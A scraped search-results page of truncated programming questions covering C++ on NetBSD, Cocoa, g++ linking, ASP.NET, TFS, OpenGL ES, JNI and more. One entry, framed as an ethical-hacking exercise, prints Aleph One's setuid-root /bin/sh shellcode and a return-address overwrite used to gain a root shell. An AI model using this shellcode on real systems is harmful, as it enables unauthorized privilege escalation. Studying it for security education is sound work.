Search Results

Search found 23084 results on 924 pages for 'jeff main'.

Page 263/924 | < Previous Page | 259 260 261 262 263 264 265 266 267 268 269 270  | Next Page >

  • Thread-local storage segfaults on NetBSD only?

    - by bortzmeyer
    Trying to run a C++ program, I get segmentation faults which appear to be specific to NetBSD. Bert Hubert wrote the simple test program (at the end of this message) and, indeed, it crashes only on NetBSD. % uname -a NetBSD golgoth 5.0.1 NetBSD 5.0.1 (GENERIC) #0: Thu Oct 1 15:46:16 CEST 2009 +stephane@golgoth:/usr/obj/sys/arch/i386/compile/GENERIC i386 % g++ --version g++ (GCC) 4.1.3 20080704 prerelease (NetBSD nb2 20081120) Copyright (C) 2006 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. % gdb thread-local-storage-powerdns GNU gdb 6.5 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386--netbsdelf"... (gdb) run Starting program: /home/stephane/Programmation/C++/essais/thread-local-storage-powerdns Program received signal SIGSEGV, Segmentation fault. 0x0804881b in main () at thread-local-storage-powerdns.cc:20 20 t_a = new Bogo('a'); (gdb) On other Unix, it works fine. Is there a known issue in NetBSD with C++ thread-local storage? #include <stdio.h> class Bogo { public: explicit Bogo(char a) { d_a = a; } char d_a; }; __thread Bogo* t_a; int main() { t_a = new Bogo('a'); Bogo* b = t_a; printf("%c\n", b->d_a); }

    Read the article

  • Cocoa UI Elements Not Updating

    - by spamguy
    I have a few Cocoa UI elements with outlet connexions to an object instantiated within an NSView object, which is in turn put there by an NSViewController. These elements, a definite progress bar and a text label, are not updating: the progress bar is dead and empty despite having its value change constantly, the text label does not unhide through [textLabel setHidden:NO], the text label does not change its string. What I know: There's no difference between binding values and setting them in code. Nothing changes either way. I've checked outlet connections. They're all there. I've tried [X displayIfNeeded], where X has been the UI objects themselves, the containing NSView, and the main window. No difference. [progressBar setUsesThreadedAnimation:YES] makes no difference. Interestingly, if I look at progressBar mid-program, _threadedAnimation is still NO. The object holding all these outlets and performing an import operation is in an NSOperationQueue owned by the NSViewController object. Thanks! EDIT: As suggested, I called [self performSelectorOnMainThread:@selector(updateProgress:) withObject:[NSNumber numberWithInt:myObject] waitUntilDone:NO]. (I've also tried waitUntilDone:YES.) It's still not updating. The debugger clearly shows updateProgress: taking place in the main thread, so I don't know what's missing.

    Read the article

  • Error trying to use rand from std library cstdlib with g++

    - by Matt
    I was trying to use the random function in Ubuntu compiling with g++ on a larger program and for some reason rand just gave weird compile errors. For testing purposes I made the simplest program I could and it still gives errors. Program: #include <iostream> using std::cout; using std::endl; #include <cstdlib> int main() { cout << "Random number " << rand(); return 0; } Error when compiling with the terminal sudo g++ chapter_3/tester.cpp ./test ./test: In function _start': /build/buildd/eglibc-2.10.1/csu/../sysdeps/i386/elf/start.S:65: multiple definition of_start' /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crt1.o:/build/buildd/eglibc-2.10.1/csu/../sysdeps/i386/elf/start.S:65: first defined here ./test:(.rodata+0x0): multiple definition of _fp_hw' /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crt1.o:(.rodata+0x0): first defined here ./test: In function_fini': (.fini+0x0): multiple definition of _fini' /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crti.o:(.fini+0x0): first defined here ./test:(.rodata+0x4): multiple definition of_IO_stdin_used' /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crt1.o:(.rodata.cst4+0x0): first defined here ./test: In function __data_start': (.data+0x0): multiple definition ofdata_start' /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crt1.o:(.data+0x0): first defined here ./test: In function __data_start': (.data+0x4): multiple definition of__dso_handle' /usr/lib/gcc/i486-linux-gnu/4.4.1/crtbegin.o:(.data+0x0): first defined here ./test: In function main': (.text+0xb4): multiple definition ofmain' /tmp/cceF0x0p.o:tester.cpp:(.text+0x0): first defined here ./test: In function _init': (.init+0x0): multiple definition ofinit' /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crti.o:(.init+0x0): first defined here /usr/lib/gcc/i486-linux-gnu/4.4.1/crtend.o:(.dtors+0x0): multiple definition of `_DTOR_END' ./test:(.dtors+0x4): first defined here /usr/bin/ld: error in ./test(.eh_frame); no .eh_frame_hdr table will be created. collect2: ld returned 1 exit status

    Read the article

  • SiteMap control based on user roles doesn't works

    - by nCdy
    <siteMapNode roles="*"> <siteMapNode url="~/Default.aspx" title=" Main" description="Main" roles="*"/> <siteMapNode url="~/Items.aspx" title=" Adv" description="Adv" roles="Administrator"/> .... any user can see Adv page. That is a trouble and a qustion : why and how to hide out of role sitenodes. but if I do HttpContext.Current.User.IsInRole("Administrator") it shows me if user in Administrator role or not. web config : <authentication mode="Forms"/> <membership defaultProvider="SqlProvider" userIsOnlineTimeWindow="20"> <providers> <add connectionStringName="FlowWebSQL" enablePasswordRetrieval="false" enablePasswordReset="true" requiresQuestionAndAnswer="true" passwordFormat="Hashed" applicationName="/" name="SqlProvider" type="System.Web.Security.SqlMembershipProvider"/> </providers> </membership> <roleManager enabled="true" defaultProvider="SqlProvider"> <providers> <add connectionStringName="FlowWebSQL" name="SqlProvider" type="System.Web.Security.SqlRoleProvider" /> </providers> </roleManager>

    Read the article

  • I have this code .... Ethical Hacking

    - by kmitnick
    hello folks, I am following this EBook about Ethical Hacking, and I reached the Linux Exploit Chapter, this is the code with Aleph's 1 code. //shellcode.c char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref. "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main() { //main function int *ret; //ret pointer for manipulating saved return. ret = (int *)&ret + 2; //setret to point to the saved return //value on the stack. (*ret) = (int)shellcode; //change the saved return value to the //address of the shellcode, so it executes. } I give this the super user privileges, with chmod u+s shellcode as a super user, then go back to normal user with su - normal_user but when I run ./shellcode I should be a root user but instead I still be normal_user so any help?? btw I am working on BT4-Final, I turned off the ASLR, and running BT4 in VMWare...

    Read the article

  • What's the equivalent of gcc's -mwindows option in cmake?

    - by Runner
    I'm following the tuto: http://zetcode.com/tutorials/gtktutorial/firstprograms/ It works but each time I double click on the executable,there is a console which I don't want it there. How do I get rid of that console? I tried this: add_executable(Cmd WIN32 cmd.c) But got this fatal error: MSVCRTD.lib(crtexew.obj) : error LNK2019: unresolved external symbol _WinMain@16 referenced in function ___tmainCRTStartup Cmd.exe : fatal error LNK1120: 1 unresolved externals While using gcc directly works: gcc -o Cmd cmd.c -mwindows .. I'm guessing it has something to do with the entry function: int main( int argc, char *argv[]),but why gcc works? How can I make it work with cmake? UPDATE Let me paste the source code here for convenience: #include <gtk/gtk.h> int main( int argc, char *argv[]) { GtkWidget *window; gtk_init(&argc, &argv); window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_widget_show(window); gtk_main(); return 0; } UPDATE2 Why gcc -mwindows works but add_executable(Cmd WIN32 cmd.c) not? Maybe that's not the equivalent for -mwindows in cmake?

    Read the article

  • Git force complete sync to master

    - by Jesse
    My workplace uses Subversion for source control so I have been playing around with git-svn for the advantages of my own branches, commit as often as I want without touching the main repo, etc. Since my git svn checkout is local, I have cloned it to a network share as well to act as a backup. My thinking is that if my desktop takes a dump I will at least have the repo on the network share to get changes that I have not had a chance to dcommit yet. My workflow is to work from the desktop, make changes, commit, etc. At the end of the day I want to update the repo on the network share with all of my current changes. I had setup the repo on the network share using git clone repo_on_my_desktop and then updating the repo on the network share with git pull origin master. The problem that I am running into is when I used do a git rebase to squish multiple commits prior to dcommitting to the main svn repository. When I do this, I get merge conflicts on the repo on the network share when I try to backup at night. Is there a way to simply sync entirely with the repository on my desktop without doing a new git clone each night?

    Read the article

  • Newb Question: passing objects in java?

    - by Adam Outler
    Hello, I am new at java. I am doing the following: Read from file, then put data into a variable. checkToken = lineToken.nextToken(); processlinetoken() } But then when I try to process it... public static void readFile(String fromFile) throws IOException { BufferedReader reader = new BufferedReader(new FileReader(fromFile)); String line = null; while ((line=reader.readLine()) != null ) { if (line.length() >= 2) { StringTokenizer lineToken = new StringTokenizer (line); checkToken = lineToken.nextToken(); processlinetoken() ...... But here's where I come into a problem. public static void processlinetoken() checkToken=lineToken.nextToken(); } it fails out. Exception in thread "main" java.lang.Error: Unresolved compilation problem: The method nextToken() is undefined for the type String at testread.getEngineLoad(testread.java:243) at testread.readFile(testread.java:149) at testread.main(testread.java:119) so how do I get this to work? It seems to pass the variable, but nothing after the . works.

    Read the article

  • TFS Folders - Getting them to work like Subversion "Trunk/Tags/Branches"

    - by Sam Schutte
    I recently started using Team Foundation Server, and am having some trouble getting it to work the way I want it to. I've used Subversion for a couple years now, and love the way it works. I always set up three folders under each project, Trunk, Tags, and Branches. When I'm working on a project, all my code lives under a folder called "C:\dev\projectname". This "projectname" folder can be made to point to either trunk, or any of the branches or tags using Subversion (with the switch command). Now that I'm using TFS (my client's system), I'd like things to work the same way. I created a "Trunk" folder with my project in it, and mapped "Project/Trunk/Website" to "c:\dev\Website". Now, I want to make a release under the "tags" folder (located in "Project/Tags/Version 1.0/Website", and TFS is giving me the following error when I execute the branch command: "No appropriate mapping exists for $Project/tags/Version 1.0/Website" From what I can find on the internet, TFS expects you to have a mapping to your hard drive at the root of the project (the "Project" folder in my case), and then have all the source code that lives in trunk, tags and branches all pulled down to your hard drive. This sucks because it requires way too much stuff on your hard drive, and even worse, when you are working in a solution in Visual Studio, you won't be able to pull down "Version 2.0" and have all your project references to other projects work, because they'll all be pointing to "trunk" folders under the main folder, not just the main folder itself. What I want to do is have the root "Project/Website" folder on my hard drive, and be able to have it point to (mapped to) either tags, branches, or trunk, depending on what i'm doing, without having to screw around with fixing Visual Studio project references. Ideas?

    Read the article

  • My 3D object (opengl es) is disappearing behind the iPhone camera view

    - by KLC
    I have an augmented reality iPhone app that I am converting from Core Animation to OpenGL ES 1.1. I have added code that has been modified from the Apple OpenGL template. My problem is that my 3D object , when translating along the negative Z-axis (away from the user), appears to disappear into the camera view, until its completely gone. I have experimented with several solutions, but to no avail. What I have determined: Using the 3D icosahedron from Jeff Lamarche's blog here, the object starts it at 0,0,0 and then translates with decreasing z coordinates. By the time the z value reaches -2.0f, the object is gone. It appears as if it is disappearing behind the camera view. This is how I set my frustrum & viewport (unchanged from Apple's code) glMatrixMode(GL_PROJECTION); size = zNear * tanf(DEGREES_TO_RADIANS(fieldOfView) / 2.0); //Grab the size of the screen CGRect rect = self.bounds; glFrustumf(-size, size, -size / (rect.size.width / rect.size.height), size / (rect.size.width / rect.size.height), zNear, zFar); glViewport(0, 0, rect.size.width, rect.size.height); glMatrixMode(GL_MODELVIEW); glLoadIdentity(); What I have tried: The camera view is the main view and several other views are added to it as subviews, including the openGLView. I have commented those views out for test purposes. I have applied CATransforms to move the openGLView in the z direction -500 and +500, and done the same to the camera view. I have also changed the zFar in the above code to 1.0f, and it still disappears at z position of -2.0, which doesn't make sense (shouldn't it disappear at z=1.0?) My experimentation has got me more confused than when I started ( which usually means I am missing a key piece, but I can't figure out what). Thanks for your help.

    Read the article

  • How can I reuse .NET resources in multiple executables?

    - by Brandon
    I have an existing application that I'm supposed to take and create a "mini" version of. Both are localized apps and we would like to reuse the resources in the main application as is. So, here's the basic structure of my apps: MainApplication.csproj /Properties/Resources.resx /MainUserControl.xaml (uses strings in Properties/Resources.resx) /MainUserControl.xaml.cs MiniApplication.csproj link to MainApplication/Properties/Resources.resx link to MainApplication/MainUserControl.xaml link to MainApplication/MainUserControl.xaml.cs MiniApplication.xaml (tries to use MainUserControl from MainApplication link) So, in summary, I've added the needed resources and user control from the main application as links in the mini application. However, when I run the mini application, I get the following exception. I'm guessing it's having trouble with the different namespaces, but how do I fix? Could not find any resources appropriate for the specified culture or the neutral culture. Make sure \"MainApplication.Properties.Resources.resources\" was correctly embedded or linked into assembly \"MiniApplication\" at compile time, or that all the satellite assemblies required are loadable and fully signed. FYI, I know I could put the user control in a user control library but the problem is that the mini application needs to have a small footprint. So, we only want to include what we need.

    Read the article

  • User entered value validation and level of error catching

    - by Terry
    May I ask should the error catching code be placed at the lowest level or at the top as I am not sure what is the best practice? I prefer placing at the bottom, example a, as Example a public static void Main(string[] args) { string operation = args[0]; int value = Convert.ToInt32(args[1]); if (operation == "date") { DoDate(value); } else if (operation == "month") { DoMonth(value); } } public static void DoMonth(int month) { if (month < 1 || month > 12) { throw new Exception(""); } } public static void DoDate(int date) { if (date < 1 || date > 31) { throw new Exception(""); } } or example b public static void Main(string[] args) { string operation = args[0]; int value = Convert.ToInt32(args[1]); if (operation == "date" && (date < 1 || date > 12)) { throw new Exception(""); } else if (operation == "month" && (month < 1 || month > 31)) { throw new Exception(""); } if (operation == "date") { DoDate(value); } else if (operation == "month") { DoMonth(value); } } public static void DoMonth(int month) { } public static void DoDate(int date) { }

    Read the article

  • Temporary non-const istream reference in constructor (C++)

    - by Christopher Bruns
    It seems that a constructor that takes a non-const reference to an istream cannot be constructed with a temporary value in C++. #include <iostream> #include <sstream> using namespace std; class Bar { public: explicit Bar(std::istream& is) {} }; int main() { istringstream stream1("bar1"); Bar bar1(stream1); // OK on all platforms // compile error on linux, Mac gcc; OK on Windows MSVC Bar bar2(istringstream("bar2")); return 0; } This compiles fine with MSVC, but not with gcc. Using gcc I get a compile error: g++ test.cpp -o test test.cpp: In function ‘int main()’: test.cpp:18: error: no matching function for call to ‘Bar::Bar(std::istringstream)’ test.cpp:9: note: candidates are: Bar::Bar(std::istream&) test.cpp:7: note: Bar::Bar(const Bar&) Is there something philosophically wrong with the second way (bar2) of constructing a Bar object? It looks nicer to me, and does not require that stream1 variable that is only needed for a moment.

    Read the article

  • What am I missing in the following buttons code?

    - by Ayush Goyal
    I am trying to increment and decrement the middle textview via buttons on the sides. The application starts up finely but by the time I click on any of the buttons it gets closed with following error. Error: process <package> has stopped unexpectedly. My main.xml: <?xml version="1.0" encoding="utf-8"?> <Button android:id="@+id/button1" android:layout_width="50dp" android:layout_height="250dp" android:text="+" android:textSize="40dp" /> <TextView android:id="@+id/tv1" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="0" android:textSize="80dp" android:layout_toRightOf="@+id/button1" android:layout_marginTop="75dp" android:layout_marginLeft="80dp" /> <Button android:id="@+id/button2" android:layout_width="50dp" android:layout_height="250dp" android:layout_alignParentRight="true" android:text="-" android:textSize="40dp" /> My java file: public class IncrementDecrementActivity extends Activity { int counter; Button add, sub; TextView tv; /** Called when the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); add = (Button) findViewById(R.id.button1); sub = (Button) findViewById(R.id.button2); tv = (TextView) findViewById(R.id.tv1); add.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { counter++; tv.setText(counter); } }); sub.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { counter--; tv.setText(counter); } }); } }

    Read the article

  • TreeMap sort by value

    - by vito huang
    I'm new to java, i want to write an comparator to that will let me sort TreeMap by value instead of the default natural sorting. i tried something like this, but can't find out what went wrong: import java.util.*; class treeMap { public static void main(String[] args) { System.out.println("the main"); byValue cmp = new byValue(); Map<String, Integer> map = new TreeMap<String, Integer>(cmp); map.put("de",10); map.put("ab", 20); map.put("a",5); for (Map.Entry<String,Integer> pair: map.entrySet()) { System.out.println(pair.getKey()+":"+pair.getValue()); } } } class byValue implements Comparator<Map.Entry<String,Integer>> { public int compare(Map.Entry<String,Integer> e1, Map.Entry<String,Integer> e2) { if (e1.getValue() < e2.getValue()){ return 1; } else if (e1.getValue() == e2.getValue()) { return 0; } else { return -1; } } } I guess what am i asking is what controls what get pass to comparator function, can i get an Map.Entry pass to comparator?

    Read the article

  • help on ejb stateless datagram and message driven beans

    - by Kemmal
    i have a client thats sending a message to the ejbserver using UDP, i want the server(stateless bean) to echo back this message to the client but i cant seem to do this. or can i implement the same logic by using JMS? please help and enlighten. this is just a test, in the end i want a midp to be sending the message to the ejb using datagrams. here is my code. @Stateless public class SessionFacadeBean implements SessionFacadeRemote { public SessionFacadeBean() { } public static void main(String[] args) { DatagramSocket aSocket = null; byte[] buffer = null; try { while(true) { DatagramPacket request = new DatagramPacket(buffer, buffer.length); aSocket.receive(request); DatagramPacket reply = new DatagramPacket(request.getData(), request.getLength(), request.getAddress(), request.getPort()); aSocket.send(reply); } } catch (SocketException e) { System.out.println("Socket: " + e.getMessage()); } catch (IOException e) { System.out.println("IO: " + e.getMessage()); } finally { if(aSocket != null) aSocket.close(); } } } and the client: public static void main(String[] args) { DatagramSocket aSocket = null; try { aSocket = new DatagramSocket(); byte [] m = "Test message!".getBytes(); InetAddress aHost = InetAddress.getByName("localhost"); int serverPort = 6789; DatagramPacket request = new DatagramPacket(m, m.length, aHost, serverPort); aSocket.send(request); byte[] buffer = new byte[1000]; DatagramPacket reply = new DatagramPacket(buffer, buffer.length); aSocket.receive(reply); System.out.println("Reply: " + new String(reply.getData())); } catch (SocketException e) { System.out.println("Socket: " + e.getMessage()); } catch (IOException e) { System.out.println("IO: " + e.getMessage()); } finally { if(aSocket != null) aSocket.close(); } } please help.

    Read the article

  • GUI toolkit for Unicode text app?

    - by wrp
    In developing a tool for processing text in exotic scripts, I'm having trouble choosing a GUI toolkit. The main part of the interface is to be a text editor, not much more elaborate than Notepad, but with its own input method editor. It is to be extensible in a scripting language so that non-programmers can develop their own input methods and display routines. It will be assumed that all files are UTF-8. More elaborate support like regexes is not needed. The main sticking points are: characters beyond the Basic Multilingual Plane right-to-left and bi-directional text extension in a scripting language cross-platform Linux/Windows/OS X My first choice was Tcl/Tk, but it lacks bidi and going beyond the BMP seems dodgy. At the other extreme, I've considered Qt with embedded ECMAScript, but that might be heavier and less malleable than I would like. I'm even thinking about making it browser based, but I'm concerned that the IM for large scripts would be too heavy for client-side processing. I've also looked at a few similar projects in Java, but the quality of the font rendering in SWING has been unacceptable. What are your experiences in handling Unicode with various toolkits? Are there other serious issues I haven't considered? What would you recommend for doing this in the lightest way?

    Read the article

  • How to authenticate my own provider( only for testing purposes)

    - by user308806
    Dear all Now, I wrote a new provider (ESMJCE provider), and I also write a simple application to test it, but I have some exceptions like that java.lang.SecurityException: JCE cannot authenticate the provider ESMJCE at javax.crypto.Cipher.getInstance(DashoA13*..) at javax.crypto.Cipher.getInstance(DashoA13*..) at testprovider.main(testprovider.java:27) Caused by: java.util.jar.JarException: Cannot parse file:/C:/Program%20Files/Java/jre1.6.0_02/lib/ext/abc.jar at javax.crypto.SunJCE_c.a(DashoA13*..) at javax.crypto.SunJCE_b.b(DashoA13*..) at javax.crypto.SunJCE_b.a(DashoA13*..) ... 3 more And here is my source code import java.security.Provider; import java.security.Security; import javax.crypto.Cipher; import esm.jce.provider.ESMProvider; public class testprovider { / @param args / public static void main(String[] args) { // TODO Auto-generated method stub ESMProvider esmprovider = new esm.jce.provider.ESMProvider(); Security.insertProviderAt(esmprovider,2); Provider[] temp = Security.getProviders(); for (int i= 0; i<temp.length; i++){ System.out.println("Providers: " temp[i].getName()); } try{ Cipher cipher = Cipher.getInstance("DES", "ESMJCE"); System.out.println("Cipher: " cipher); int blockSize= cipher.getBlockSize(); System.out.println("blockSize= " + blockSize); }catch (Exception e){ e.printStackTrace(); } } } Please help me solve this issue Thanks

    Read the article

  • eclipse django using wrong settings.py in pythonpath

    - by user1290264
    I have pydev/django installed in eclipse, and it runs fine. However, after adding a second django project to eclipse and running the server ('http://127.0.0.1:8000') the pythonpath seems to be stuck on project2 even when I run project1. As a summary, I have two django projects: project1, project2. When I run the django server for project1 I get: Validating models... 0 errors found Django version 1.5, using settings 'project1.settings' Development server is running at 'http://127.0.0.1:8000/' Quit the server with CTRL-BREAK. The above seems to suggest that django is using the correct settings file; however, when I go to 'http://127.0.0.1:8000/' it displays the urls from project2. Also, if I go to 'http://127.0.0.1:8000/admin' the models are getting pulled from the sqlite.db file in project2 as well. I've even tried removing project2 from eclipse entirely and now at 'http://127.0.0.1:8000/admin' I get this error: Python Path: ['C:\Users\Brad\workspaces\In Progress\project2', 'C:\Users\Brad\workspaces\In Progress\project2', 'C:\Python27\DLLs', 'C:\Python27\lib', 'C:\Python27\lib\plat-win', 'C:\Python27\lib\lib-tk', 'C:\Python27', 'C:\Python27\lib\site-packages', 'C:\Windows\system32\python27.zip'] If I run the server on a different port with project1 the path seems to be fine: runserver 7000 --noreload Then 'http://127.0.0.1:7000/' uses project1's paths, but it doesn't seem like I should have to do this. Note: I have setup the run configurations as correctly as I know how. In the main tab, the project and main module both point to the correct project (project1), and the "PYTHONPATH that will be used in the run:" includes project1. Also, I have cleared my browser history, cookies, and everything that chrome would let me delete.

    Read the article

  • FILE* issue PPU side code

    - by Cristina
    We are working on a homework on CELL programming for college and their feedback response to our questions is kinda slow, thought i can get some faster answers here. I have a PPU side code which tries to open a file passed down through char* argv[], however this doesn't work it cannot make the assignment of the pointer, i get a NULL. Now my first idea was that the file isn't in the correct directory and i copied in every possible and logical place, my second idea is that maybe the PPU wants this pointer in its LS area, but i can't deduce if that's the bug or not. So... My question is what am i doing wrong? I am working with a Fedora 7 SDK Cell, with Eclipse as an IDE. Maybe my argument setup is wrong tho he gets the name of the file correctly. Code on request: images_t *read_bin_data(char *name) { FILE *file; images_t *img; uint32_t *buffer; uint8_t buf; unsigned long fileLen; unsigned long i; //Open file file = (FILE*)malloc(sizeof(FILE)); file = fopen(name, "rb"); printf("[Debug]Opening file %s\n",name); if (!file) { fprintf(stderr, "Unable to open file %s", name); return NULL; } //....... } Main launch: int main(int argc,char* argv[]) { int i,img_width; int modif_this[4] __attribute__ ((aligned(16))) = {1,2,3,4}; images_t *faces, *nonfaces; spe_context_ptr_t ctxs[SPU_THREADS]; pthread_t threads[SPU_THREADS]; thread_arg_t arg[SPU_THREADS]; //intializare img_width img_width = atoi(argv[1]); printf("[Debug]Img size is %i\n",img_width); faces = read_bin_data(argv[3]); //....... } Thanks for the help.

    Read the article

  • C# vs C - Big performance difference

    - by John
    I'm finding massive performance differences between similar code in C anc C#. The C code is: #include <stdio.h> #include <time.h> #include <math.h> main() { int i; double root; clock_t start = clock(); for (i = 0 ; i <= 100000000; i++){ root = sqrt(i); } printf("Time elapsed: %f\n", ((double)clock() - start) / CLOCKS_PER_SEC); } And the C# (console app) is: using System; using System.Collections.Generic; using System.Text; namespace ConsoleApplication2 { class Program { static void Main(string[] args) { DateTime startTime = DateTime.Now; double root; for (int i = 0; i <= 100000000; i++) { root = Math.Sqrt(i); } TimeSpan runTime = DateTime.Now - startTime; Console.WriteLine("Time elapsed: " + Convert.ToString(runTime.TotalMilliseconds/1000)); } } } With the above code, the C# completes in 0.328125 seconds (release version) and the C takes 11.14 seconds to run. The c is being compiled to a windows executable using mingw. I've always been under the assumption that C/C++ were faster or at least comparable to C#.net. What exactly is causing the C to run over 30 times slower? EDIT: It does appear that the C# optimizer was removing the root as it wasn't being used. I changed the root assignment to root += and printed out the total at the end. I've also compiled the C using cl.exe with the /O2 flag set for max speed. The results are now: 3.75 seconds for the C 2.61 seconds for the C# The C is still taking longer, but this is acceptable

    Read the article

  • If statement is ignored

    - by user2898120
    I am making a simple matchmaker as a learning project in JAVA. My program so far just asks a few questions, but I wanted to do gender specific questions, so I asked for their sex (m or f) and then attempted to add a message that only showed if sex was m. The dialog should say "well done, you are male!". Else it restarts method. Every time, no matter what I type it restarts the program. Here is my code: import javax.swing.JOptionPane; public class Main { public static void main(String[] args){ setVars(); } public static void setVars(){ String name = JOptionPane.showInputDialog(null, "What is your name?"); String sAge = JOptionPane.showInputDialog(null, "What is your age?"); String sex = JOptionPane.showInputDialog(null, "What is your sex?\n(Enter m or f)"); if (sex == "m"){ JOptionPane.showMessageDialog(null, "Well done, you are male.\nKeep Going!"); } int age = Integer.parseInt(sAge); String chars = JOptionPane.showInputDialog(null, "Name three charectaristics"); } }

    Read the article

  • What's your preferred pointer declaration style, and why?

    - by Owen
    I know this is about as bad as it gets for "religious" issues, as Jeff calls them. But I want to know why the people who disagree with me on this do so, and hear their justification for their horrific style. I googled for a while and couldn't find a style guide talking about this. So here's how I feel pointers (and references) should be declared: int* pointer = NULL; int& ref = *pointer; int*& pointer_ref = pointer; The asterisk or ampersand goes with the type, because it modifies the type of the variable being declared. EDIT: I hate to keep repeating the word, but when I say it modifies the type I'm speaking semantically. "int* something;" would translate into English as something like "I declare something, which is a pointer to an integer." The "pointer" goes along with the "integer" much more so than it does with the "something." In contrast, the other uses of the ampersand and asterisk, as address-of and dereferencing operators, act on a variable. Here are the other two styles (maybe there are more but I really hope not): int *ugly_but_common; int * uglier_but_fortunately_less_common; Why? Really, why? I can never think of a case where the second is appropriate, and the first only suitable perhaps with something like: int *hag, *beast; But come now... multiple variable declarations on one line is kind of ugly form in itself already.

    Read the article

  • Creating a QMainWindow from Java using JNI

    - by ebasconp
    Hi everybody: I'm trying to create a Qt main windows from Java using JNI directly and I got a threading error. My code looks like this: Test class: public class Test { public static void main(String... args) { System.out.println(System.getProperty("java.library.path")); TestWindow f = new TestWindow(); f.show(); } } TestWindow class: public class TestWindow { static { System.loadLibrary("mylib"); } public native void show(); } C++ impl: void JNICALL Java_testpackage_TestWindow_show (JNIEnv *, jobject) { int c = 0; char** a = NULL; QApplication* app = new QApplication(c, a); QMainWindow* mw = new QMainWindow(); mw->setWindowTitle("Hello"); mw->setGeometry(150, 150, 400, 300); mw->show(); QApplication::exec(); } and I get my window painted but frozen (it does not receive any event) and the following error message when instantiating the QMainWindow object: QCoreApplication::sendPostedEvents: Cannot send posted events for objects in another thread I know all the UI operations must done in the UI thread but in my example I created the QApplication in the only thread I have running, so, everything should work properly. I did some tests executing the code of my "show" method from a QMetaObject::invokeMethod stuff using Qt::QueuedConnection but nothing works properly. I know I could use Jambi... but I know that it could be done natively too and that is what I want to do :) Any ideas on this? Thanks in advance! Ernesto

    Read the article

  • Flex build error

    - by incrediman
    I'm totally new to flex. I'm getting a build error when using flex. That is, I've generated a .c file using flex, and, when running it, am getting this error: 1>lextest.obj : error LNK2001: unresolved external symbol "int __cdecl isatty(int)" (?isatty@@YAHH@Z) 1>C:\...\lextest.exe : fatal error LNK1120: 1 unresolved externals here is the lex file I'm using (grabbed from here): /*** Definition section ***/ %{ /* C code to be copied verbatim */ #include <stdio.h> %} /* This tells flex to read only one input file */ %option noyywrap %% /*** Rules section ***/ /* [0-9]+ matches a string of one or more digits */ [0-9]+ { /* yytext is a string containing the matched text. */ printf("Saw an integer: %s\n", yytext); } . { /* Ignore all other characters. */ } %% /*** C Code section ***/ int main(void) { /* Call the lexer, then quit. */ yylex(); return 0; } As well, why do I have to put a 'main' function in the lex syntax code? What I'd like is to be able to call yylex(); from another c file.

    Read the article

< Previous Page | 259 260 261 262 263 264 265 266 267 268 269 270  | Next Page >